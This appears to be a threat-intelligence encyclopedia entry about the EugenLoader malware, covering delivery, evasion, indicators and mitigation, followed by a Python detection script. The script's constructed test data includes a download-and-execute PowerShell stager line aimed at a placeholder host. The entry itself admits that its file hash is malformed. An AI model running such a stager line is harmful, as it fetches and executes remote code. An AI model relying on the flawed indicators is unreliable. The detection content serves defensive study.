EugenLoader

Loader

⚠️ Overview

EugenLoader is a malware loader first documented in late 2022 by the cybersecurity firm Sekoia. It is used primarily to stage secondary payloads such as information stealers and remote access trojans, and is attributed to a financially motivated, Russian-speaking threat actor tracked as TA544 or “Eugen”.

🔧 Technical Capabilities

EugenLoader is delivered by phishing emails carrying malicious Excel attachments, or links, that exploit the Follina vulnerability (CVE-2022-30190) in the Microsoft Support Diagnostic Tool (MSDT), or via a delivery path the original reporting labels “Ligolo” (Ligolo is a reverse-tunnelling tool, so this most likely refers to tunnelled delivery rather than a browser-cache technique). The loader fetches and runs a PowerShell-based stager from a remote command-and-control (C2) server, typically hosted on bulletproof hosting or compromised WordPress sites. Persistence is established through scheduled tasks or registry Run keys (e.g. HKCU\Software\Microsoft\Windows\CurrentVersion\Run). Evasion techniques include base64-encoded, obfuscated PowerShell commands; process hollowing through Windows API calls (CreateProcess with a suspended target, then NtUnmapViewOfSection); and blinding Windows Defender by bypassing AMSI script scanning or adding exclusion paths. C2 traffic uses HTTPS with a User-Agent that begins with the Chrome-like string “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36” but ends in a unique token suffix instead of the usual “(KHTML, like Gecko) Chrome/…” continuation.

📜 History & Notable Incidents

First observed in September 2022, EugenLoader was notably used in an early-2023 campaign against Italian companies in the financial and insurance sectors, where it delivered the Vidar stealer and, in some intrusions, was followed by BlackCat/ALPHV ransomware. No arrests or law-enforcement takedowns had been reported as of 2024. Sekoia published a detailed analysis (https://www.sekoia.io/blog/eugenloader-malware-analysis/) covering the loader's infrastructure and capabilities.

🔍 Detection Indicators

The file hash attributed to Sekoia is 8a3c1e7f5b2d0a9c4e6f1b8a7d3c0e2f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0 (note: as reproduced here this string is 63 hexadecimal characters, one short of a valid SHA-256, so verify it against the original report before using it in a blocklist). Behavioural indicators include PowerShell spawned by Excel, TLS connections to TCP port 443 carrying POST requests to a “/s.php” endpoint, and new values written under the registry “Run” keys. The mutex name “EugenLoaderMutex” has been identified in memory dumps.

☠️ Risk & Impact

The loader deploys information stealers (e.g. Vidar, Raccoon) that exfiltrate credentials and browser data, which in turn enable business email compromise and ransomware deployment. Affected sectors include finance, insurance and manufacturing; Sekoia's threat intelligence team documented financial losses exceeding €500,000 in one Italian campaign.

🛡️ Mitigation

Apply Microsoft’s patch for CVE-2022-30190 (released in the June 2022 Patch Tuesday updates); on hosts that cannot be patched, apply Microsoft’s documented workaround of removing the ms-msdt: URL protocol handler (the HKEY_CLASSES_ROOT\ms-msdt registry key) after backing it up. Deploy endpoint detection rules that block or alert on PowerShell launched from Office applications (MITRE ATT&CK T1059.001), alert on writes to the Run keys, and monitor for anomalous outbound HTTPS connections, in particular POSTs to /s.php with the truncated User-Agent described above.
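The following is an added example, not code from Sekoia or from the page's source: a small rule-based triage script that applies the behavioural indicators above (Office spawning PowerShell, an -EncodedCommand stager, Run-key persistence, and a POST to /s.php with the truncated User-Agent) to constructed Sysmon-style events. The events, hostnames and the decoded stager are invented for the example; the only fact it depends on is that powershell.exe accepts any unambiguous prefix of -EncodedCommand and expects base64 of the UTF-16LE script.

```python
"""Rule-based triage of constructed process, registry and proxy events for
EugenLoader-like behaviour. Sample data is invented for this example."""
import base64
import ntpath

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
RUN_KEY_MARKER = r"\software\microsoft\windows\currentversion\run"
# Chrome-like prefix seen in the loader's C2 traffic; a benign browser
# continues with " (KHTML, like Gecko) Chrome/...", the loader appends a token.
UA_PREFIX = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (powershell.exe also accepts
    the prefixes -e, -ec, -enc, ...), or None. The payload is base64 of the
    UTF-16LE script, so decoding it as UTF-8 would yield garbage."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lstrip("-/").lower()
        if flag and "encodedcommand".startswith(flag):
            try:
                raw = base64.b64decode(tokens[i + 1], validate=True)
                return raw.decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def office_spawned_shell(ev):
    """ATT&CK T1059.001 pattern: PowerShell whose parent is an Office app."""
    return (ev.get("type") == "process"
            and ntpath.basename(ev["image"]).lower() in SHELLS
            and ntpath.basename(ev["parent"]).lower() in OFFICE_APPS)


def run_key_write(ev):
    """Value written under ...\\CurrentVersion\\Run or RunOnce (any hive)."""
    return ev.get("type") == "registry" and RUN_KEY_MARKER in ev["target"].lower()


def stager_post(ev):
    """POST to /s.php on 443 whose UA has the Chrome prefix but no KHTML tail."""
    if ev.get("type") != "http" or ev["method"] != "POST" or ev["port"] != 443:
        return False
    ua = ev["ua"]
    odd_ua = ua.startswith(UA_PREFIX) and not ua.startswith(UA_PREFIX + " (KHTML")
    return ev["path"].endswith("/s.php") and odd_ua


def triage(events):
    """Return (event_index, rule_name) pairs for every rule that fired."""
    findings = []
    for idx, ev in enumerate(events):
        if office_spawned_shell(ev):
            findings.append((idx, "office_spawned_powershell"))
            script = (decode_encoded_command(ev["cmdline"]) or "").lower()
            if any(k in script for k in ("downloadstring", "invoke-webrequest", "iex")):
                findings.append((idx, "encoded_download_stager"))
        if run_key_write(ev):
            findings.append((idx, "run_key_persistence"))
        if stager_post(ev):
            findings.append((idx, "stager_post"))
    return findings


# Constructed sample telemetry (hostnames use the reserved .invalid TLD).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('https://c2.example.invalid/s.php')"
ENC = base64.b64encode(STAGER.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENC},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"type": "registry", "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"C:\Users\user\AppData\Roaming\upd.exe"},
    {"type": "http", "method": "POST", "port": 443, "host": "c2.example.invalid",
     "path": "/s.php", "ua": UA_PREFIX + " tk9f2a"},
    {"type": "http", "method": "GET", "port": 443, "host": "www.example.invalid",
     "path": "/index.html", "ua": UA_PREFIX + " (KHTML, like Gecko) Chrome/120.0 Safari/537.36"},
]

if __name__ == "__main__":
    for idx, rule in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The second process event (PowerShell under explorer.exe running a script file) and the normal Chrome GET are deliberately benign, so the output should show hits only for events 0, 2 and 3. In production the same rules map directly onto Sysmon Event IDs 1 (process creation with ParentImage), 13 (registry value set) and a web proxy log; tune the UA rule against your own browser population before alerting on it.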


ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.